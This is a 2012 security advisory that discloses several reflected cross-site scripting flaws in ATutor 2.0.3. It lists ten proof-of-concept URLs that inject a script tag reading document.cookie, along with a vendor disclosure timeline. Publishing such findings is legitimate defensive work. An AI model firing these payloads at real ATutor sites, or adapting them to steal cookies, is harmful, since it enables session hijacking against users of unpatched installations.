Advisory: ATutor 2.0.3 Multiple XSS vulnerabilities
Advisory ID: SSCHADV2012-002
Author: Stefan Schurtz
Affected Software: Successfully tested on ATutor 2.0.3
Vendor URL: http://atutor.ca
Vendor Status: informed
==========================
Vulnerability Description
==========================
ATutor 2.0.3 is prone to multiple XSS vulnerabilities
==================
PoC-Exploit
==================
http://[target]/ATutor/themes/default/tile_search/index.tmpl.php/" <script>alert(document.cookie)</script>
http://[target]/ATutor/login.php/index.php" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/search.php/index.php" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/password_reminder.php" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/login.php/jscripts/infusion/" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/login.php/mods/_standard/flowplayer/" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/browse.php/jscripts/infusion/framework/fss/" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/registration.php/themes/default/ie_styles.css" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/about.php/" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/themes/default/social/basic_profile.tmpl.php/" <script>alert(document.cookie)</script>/index.php
=========
Solution
=========
-
====================
Disclosure Timeline
====================
01-Jan-2012 - vendor informed
01-Jan-2012 - vendor feedback
15-Jan-2012 - no fix available
========
Credits
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References
===========
http://atutor.ca/view/3/22740/1.html
http://www.darksecurity.de/advisories/2012/SSCHADV2012-002.txt
